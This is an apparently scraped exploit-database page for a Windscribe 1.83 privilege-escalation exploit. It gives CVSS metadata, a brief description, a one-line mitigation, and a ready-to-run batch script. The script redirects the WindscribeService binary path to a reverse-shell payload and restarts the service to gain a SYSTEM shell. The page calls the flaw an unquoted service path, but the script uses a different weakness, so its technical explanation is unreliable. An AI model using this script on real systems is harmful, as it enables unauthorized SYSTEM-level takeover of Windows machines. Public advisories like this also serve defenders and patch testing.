header-logo
Suggest Exploit
vendor:
Windscribe
by:
Ethan Seow
7.8
CVSS
HIGH
Unquoted Service Path
787
CWE
Product Name: Windscribe
Affected Version From: 1.83
Affected Version To: 1.83
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Microsoft Windows 10 Home 10.0.18363 Build 18363
2020

Windscribe 1.83 – ‘WindscribeService’ Unquoted Service Path

This exploit allows an attacker to gain SYSTEM level privileges by exploiting the unquoted service path vulnerability in Windscribe 1.83. The attacker can use a reverse shell payload to gain access to the system. The exploit code starts by configuring the WindscribeService binPath to the reverse shell payload, then stopping and starting the service. The exploit is successful when the reverse shell is triggered.

Mitigation:

Ensure that all service paths are properly quoted and that all services are running with the least privileges necessary.
Source

Exploit-DB raw data:

# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
# Date: 2020-06-26
# Exploit Author: Ethan Seow
# Vendor Homepage: https://windscribe.com
# Version: v1.83 Build 20
# Tested on: Microsoft Windows 10 Home 10.0.18363 Build 18363


#filename : exploit.bat

#Code start
@echo off

sc config WindscribeService binPath="cmd /k {PATH TO REVERSE SHELL e.g.
C:\Users\Public\payload.exe}"
sc stop WindscribeService
sc start WindscribeService
echo Exploit success! SYSTEM reverse shell should be triggered :DDDDD
pause

#Code end

Navigation

Suggest Exploit

Services By CQR